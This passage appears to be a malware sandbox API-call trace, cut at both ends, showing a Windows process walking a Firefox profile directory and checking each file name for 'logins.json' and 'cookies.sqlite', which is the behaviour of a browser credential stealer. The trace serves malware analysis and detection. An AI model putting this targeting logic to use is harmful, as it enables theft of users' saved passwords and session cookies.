HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.134] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0161.134] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.134] GetProcessHeap () returned 0x8e0000 [0161.134] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.134] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0161.134] lstrlenW (lpString="") returned 0 [0161.134] GetProcessHeap () returned 0x8e0000 [0161.134] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fcf68 [0161.134] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0161.134] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0161.134] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0161.134] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0161.134] lstrlenW (lpString="\\*.*") returned 4 [0161.134] GetProcessHeap () returned 0x8e0000 [0161.134] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd8) returned 0x924988 [0161.134] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0161.134] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*.*" [0161.135] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*.*", lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x8503de70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x8503de70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName=".", cAlternateFileName="")) returned 0x8f9a80 [0161.135] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.135] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x8503de70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x8503de70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName="..", cAlternateFileName="")) returned 1 [0161.135] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.135] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.135] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc37c9330, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc37c9330, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc37df2c0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xbdb, dwReserved0=0x54, dwReserved1=0x54, cFileName="bookmarks-2017-06-05_5.json", cAlternateFileName="BOOKMA~1.JSO")) returned 1 [0161.136] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0161.136] lstrlenW (lpString="\\") returned 1 [0161.136] GetProcessHeap () returned 0x8e0000 [0161.136] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x924a68 [0161.136] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0161.136] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0161.136] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0161.136] lstrlenW (lpString="bookmarks-2017-06-05_5.json") returned 27 [0161.136] GetProcessHeap () returned 0x8e0000 [0161.136] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x108) returned 0x924b48 [0161.136] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0161.136] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="bookmarks-2017-06-05_5.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" [0161.136] VirtualQuery (in: lpAddress=0x924a68, lpBuffer=0x2df4e0, dwLength=0x1c | out: lpBuffer=0x2df4e0*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.136] GetProcessHeap () returned 0x8e0000 [0161.136] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a68 | out: hHeap=0x8e0000) returned 1 [0161.136] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json", lpSrch="logins.json") returned 0x0 [0161.136] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json", lpSrch="cookies.sqlite") returned 0x0 [0161.136] VirtualQuery (in: lpAddress=0x924b48, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.136] GetProcessHeap () returned 0x8e0000 [0161.136] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924b48 | out: hHeap=0x8e0000) returned 1 [0161.136] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85017d10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x85017d10, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85017d10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xbdb, dwReserved0=0x54, dwReserved1=0x54, cFileName="bookmarks-2017-06-16_5.json", cAlternateFileName="BOOKMA~2.JSO")) returned 1 [0161.136] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0161.136] lstrlenW (lpString="\\") returned 1 [0161.136] GetProcessHeap () returned 0x8e0000 [0161.136] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x924a68 [0161.136] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0161.136] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0161.136] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0161.136] lstrlenW (lpString="bookmarks-2017-06-16_5.json") returned 27 [0161.136] GetProcessHeap () returned 0x8e0000 [0161.136] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x108) returned 0x924b48 [0161.136] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0161.136] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="bookmarks-2017-06-16_5.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" [0161.137] VirtualQuery (in: lpAddress=0x924a68, lpBuffer=0x2df4e0, dwLength=0x1c | out: lpBuffer=0x2df4e0*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.137] GetProcessHeap () returned 0x8e0000 [0161.137] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a68 | out: hHeap=0x8e0000) returned 1 [0161.137] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json", lpSrch="logins.json") returned 0x0 [0161.137] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json", lpSrch="cookies.sqlite") returned 0x0 [0161.137] VirtualQuery (in: lpAddress=0x924b48, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.137] GetProcessHeap () returned 0x8e0000 [0161.137] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924b48 | out: hHeap=0x8e0000) returned 1 [0161.137] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85017d10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x85017d10, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85017d10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xbdb, dwReserved0=0x54, dwReserved1=0x54, cFileName="bookmarks-2017-06-16_5.json", cAlternateFileName="BOOKMA~2.JSO")) returned 0 [0161.137] FindClose (in: hFindFile=0x8f9a80 | out: hFindFile=0x8f9a80) returned 1 [0161.137] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.138] GetProcessHeap () returned 0x8e0000 [0161.138] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.138] VirtualQuery (in: lpAddress=0x8fcf68, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.138] GetProcessHeap () returned 0x8e0000 [0161.138] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcf68 | out: hHeap=0x8e0000) returned 1 [0161.138] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.138] GetProcessHeap () returned 0x8e0000 [0161.138] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.138] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.138] lstrlenW (lpString="\\") returned 1 [0161.138] GetProcessHeap () returned 0x8e0000 [0161.138] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.138] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.138] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.138] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.138] lstrlenW (lpString="bookmarkbackups") returned 15 [0161.138] GetProcessHeap () returned 0x8e0000 [0161.138] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fce90 [0161.138] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.138] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0161.138] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.138] GetProcessHeap () returned 0x8e0000 [0161.138] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.138] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpSrch="logins.json") returned 0x0 [0161.138] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpSrch="cookies.sqlite") returned 0x0 [0161.138] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.138] GetProcessHeap () returned 0x8e0000 [0161.138] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.138] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb47c9bf0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb47c9bf0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x853f60d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="cert8.db", cAlternateFileName="")) returned 1 [0161.138] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.138] lstrlenW (lpString="\\") returned 1 [0161.138] GetProcessHeap () returned 0x8e0000 [0161.138] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.138] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.139] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.139] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.139] lstrlenW (lpString="cert8.db") returned 8 [0161.139] GetProcessHeap () returned 0x8e0000 [0161.139] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x924a48 [0161.139] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.139] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="cert8.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" [0161.139] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.139] GetProcessHeap () returned 0x8e0000 [0161.139] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.139] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db", lpSrch="logins.json") returned 0x0 [0161.139] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db", lpSrch="cookies.sqlite") returned 0x0 [0161.139] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.139] GetProcessHeap () returned 0x8e0000 [0161.139] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.139] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x80696ec0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="compatibility.ini", cAlternateFileName="COMPAT~1.INI")) returned 1 [0161.139] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.139] lstrlenW (lpString="\\") returned 1 [0161.139] GetProcessHeap () returned 0x8e0000 [0161.139] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.139] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.139] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.139] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS 